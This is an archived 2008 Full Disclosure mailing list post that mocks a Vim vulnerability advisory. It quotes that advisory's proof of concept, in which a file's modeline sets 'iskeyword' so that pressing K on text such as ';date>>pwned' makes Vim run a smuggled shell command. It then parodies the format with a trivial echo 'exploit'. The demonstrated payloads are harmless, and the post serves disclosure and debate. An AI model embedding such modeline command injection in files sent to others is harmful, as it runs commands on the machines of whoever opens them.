Full Disclosure mailing list archives
Arbitrary Command Execution in Windows and Unix Shells.
From: Bob Beck <beck () ualberta ca>
Date: Fri, 22 Aug 2008 10:43:01 -0600
Stupidity + Copy and Paste Considered Harmful
4. EXPLOIT Copy-and-paste these examples into separate files: ;xclock vim: set iskeyword=;,@ Place your cursor on ``xclock'', and press K. xclock appears. ;date>>pwned vim: set iskeyword=1-255 Place your cursor on ``date'' and press K. File ``pwned'' is created in the current working directory. Please note: If modeline processing is disabled, set the 'iskeyword' option manually. See the thread on the Vim Developers' mailing list for some other examples[2].
(yes indeed, vim doesn't completely sanitize it's input) EXPLOIT: echo '1 b3 1ee7' >> pwned Copy and paste the above line into a unix shell or windows cmd window. File pwned is created. Note, if the windowing system is not started, type the above command in manually. IMPACT: I can create this file and mail it to ANYONE! ZOMG! Someone get me Kaminsky's slide templates so I can get the PR machine going for this discovery. And I thought XSS stuff was lame. Sheesh. -- #!/usr/bin/perl if ((not 0 && not 1) != (! 0 && ! 1)) { print "Larry and Tom must smoke some really primo stuff...\n"; } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Vim: Arbitrary Code Execution in Commands: K, Control-], g] Jan Minář (Aug 22)
- Re: Vim: Arbitrary Code Execution in Commands: K, Control-], g] staff (Aug 22)
- Arbitrary Command Execution in Windows and Unix Shells. Bob Beck (Aug 22)
- Re: Arbitrary Code Execution in Commands: K, Control-], g] Michael Wojcik (Aug 26)